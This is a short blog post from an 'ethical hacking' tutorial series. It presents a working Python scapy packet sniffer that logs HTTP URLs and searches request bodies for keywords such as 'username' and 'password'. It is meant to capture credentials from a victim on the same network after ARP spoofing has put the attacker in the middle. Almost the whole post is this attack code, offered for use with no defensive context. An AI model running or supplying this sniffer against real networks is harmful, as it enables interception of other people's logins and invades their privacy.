Python Ethical Hacking - Packet Sniffer(2)

 Capturing passwords from any computer connected to the same network. 


  • Target a computer on the same network.
  • arp_spoof to redirect the flow of packets(become MITM)
  • Packet_sniffer to see URLs, usernames, and passwords sent by the target.
#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import *

def sniff(interface):
    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def get_url(packet):
    return packet[HTTPRequest].Host.decode(errors='ignore') + packet[HTTPRequest].Path.decode(errors='ignore')

def get_login_info(packet):
    if packet.haslayer(scapy.all.Raw):
        load = packet[scapy.all.Raw].load.decode(errors='ignore')
        keywords = ["username", "user", "login", "password", "pass"]
        for keyword in keywords:
            if keyword in load:
                return load

def process_sniffed_packet(packet):
    if packet.haslayer(HTTPRequest):
        url = get_url(packet)
        print("[+] HTTP Request >> " + url)

        login_info = get_login_info(packet)
        if login_info:
            print("\n\n[+] Possible username/password > " + login_info + "\n\n")



posted @ 2019-09-01 00:04  晨风_Eric  阅读(257)  评论(0编辑  收藏  举报